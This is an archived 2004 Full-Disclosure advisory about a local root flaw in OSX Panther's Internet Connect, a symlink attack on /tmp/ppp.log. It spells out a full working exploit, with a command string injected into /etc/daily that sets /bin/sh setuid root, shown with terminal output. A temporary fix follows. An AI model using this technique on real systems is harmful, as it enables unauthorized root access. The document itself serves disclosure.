lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <65DC921F-DE2D-11D8-A236-000A9573B5F6@blueyonder.co.uk>
From: br00t at blueyonder.co.uk (B-r00t)
Subject: OSX Panther Internet Connect Vulnerability.




Apple OSX Panther Internet Connect - Local root Vulnerability.
==============================================================

Date:		25.07.2004
Author:		B-r00t. 2004.
Email:		B-r00t <br00t@...eyonder.co.uk>

Vendor:		Apple

Operating
System:		OSX Panther (Possibly Previous Versions).

Application:	Internet Connect.app

Tested:		Panther 10.3.4 (Internet Connect v1.3)

Problem:		Internet Connect allows any file on the file
			system to be altered.

Status:		0day! - Temporary Fix Included.

Description:
		Apples Internet Connect application creates a
		'ppp.log' file in '/tmp/'. If the file already
		exists it is opened in append mode. If it does
		not exist a new file is created.

		It is possible to trick Internet Connect into
		appending data to any file on the filesystem by
		creating a symlink file '/tmp/ppp.log' pointing
		to the file to be altered.

		If the file '/tmp/ppp.log' already exists, the
		attack is not possible as the file is owned by
		user 'root' and group 'wheel': -

		$ ls -l /tmp/ppp.log
		-rw-r--r--  1 root  wheel  807 24 Jul 23:44 /tmp/ppp.log

		However, due to the Operating System clearing the
		'/tmp' directory during system startup and also on
		a regular basis due to system maintenance, it
		becomes possible to form the attack as shown below:

		First a file is created to represent a system file,
		owned and only writable by user 'root'.

		maki:~ # echo "TEST" > /etc/file_owned_by_root
		
		maki:~ # ls -l /etc/file_owned_by_root
		-rw-r--r--  1 root  wheel  5 25 Jul 00:09 /etc/file_owned_by_root
		
		maki:~ # cat /etc/file_owned_by_root
		TEST
		
		A symlink is now created in the '/tmp' directory to
		point to the file to be altered. It is important to
		realise that the link can be created as a none 'admin'
		or 'root' user.

		maki:/tmp $ id
		uid=502(br00t) gid=502(br00t) groups=502(br00t)

		maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
		
		maki:/tmp $ ls -l ./ppp.log
		lrwxr-xr-x  1 root  wheel  23 25 Jul 00:11 ./ppp.log@ -> 
/etc/file_owned_by_root

		Now Internet Connect is opened. Under 'configuration'
		choose 'Other'. Enter some text into the 'Telephone
		Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.

		'Cancel' can be clicked several seconds later.

		Checking the original file '/etc/file_owned_by_root'
		we see the following: -

		maki:~ $ cat /etc/file_owned_by_root
		TEST
		Sun Jul 25 00:20:42 2004 : Version 2.0
		Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
		Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
		Sun Jul 25 00:20:58 2004 : Serial link disconnected.

		As can be seen, data has been appended to the 'protected'
		file.

Impact:	It is possible for a local user to escalate their
		privileges by appending data to specific system files.
		In addition, a malicious user may be able to render the
		machine unusable by corrupting important system files.

Exploit:	This demonstration appends commands to the '/etc/daily'
		file which is executed by default at 3:15AM each day.
		An alternative attack might involve appending to any
		of the files that are sourced at system start up such
		as '/etc/rc.common'. This latter method is convenient
		if the user is able to reboot the machine.
		
		Create our link
		maki:~ $ ln -s /etc/daily /tmp/ppp.log

		Open Internet Connect.
		Internal Modem -> Configuration -> Other

		Internet Connect only allows certain characters to be
		used for the telephone number. The background '&'
		character allows our command string to execute amongst
		the time and date strings also appended.

		Telephone Number:
		& cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &

		Click 'Connect' ...*wait (10secs) ... 'Cancel'

		Check the '/etc/daily' file.
		maki:~ $ tail /etc/daily
		if [ -f /etc/security ]; then
     		echo ""
     		echo "Running security:"
     		sh /etc/security 2>&1 | sendmail root
		fi

		Sun Jul 25 03:10:11 2004 : Version 2.0
		Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd .. 
&& cd bin && chmod 4755 sh &
		Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
		Sun Jul 25 03:10:17 2004 : Serial link disconnected.

		Now sit back and wait for cron to execute '/etc/daily' at 03:15AM.
		
		maki:~ $ date
		Sun Jul 25 03:13:43 CEST 2004

		maki:~ $ cd /bin

		maki:/bin $ ls -l sh
		-r-xr-xr-x  1 root  wheel  603488 25 Jun 09:39 sh*

		maki:/bin $ date
		Sun Jul 25 03:15:50 CEST 2004

		maki:/bin $ ls -l sh
		-rwsr-xr-x  1 root  wheel  603488 25 Jun 09:39 sh*

		maki:/bin $ sh
		
		maki:/bin # id
		uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t)

		All thats left to do is clean up '/etc/daily' and remove the link
		'/tmp/ppp.log'		

FIX:		The following commands serve to provide a temporary fix until
		Apple release an official update.

		Open a terminal: /Applications/Utilities/Terminal.app
		Gain root access using 'sudo':

		maki:~ $ sudo sh
		Password:[YOUR PASSWORD]
	
		maki:~ # whoami
		root

		You can copy and paste the following commands: -

		/usr/bin/touch /tmp/ppp.log
		echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily
		echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common

		These commands ensure that a '/tmp/ppp.log' file is
		present to prevent a user from creating a link as shown
		above. Alternatively the line:

		/usr/bin/touch /tmp/ppp.log

		can be added to each file '/etc/daily' and '/etc/rc.common'
		manually using an editor and root privileges.

Shoutz:	Marshal-L, Ruxsaw, Haggis & Kraft.
		s1, Blex & the old #cheese posse (RIP).
		Maz ... Good Luck For The Wedding!

		

B#.
--

----------------------------------------------------
Email : B-r00t <br00t@...eyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
                   ED33 AD56 9E97 7101 5462

"There's no way a highschool punk can put a dime
into a telephone and break into our system."
-----------------------------------------------------


-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 186 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040725/6d78a5f5/PGP.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ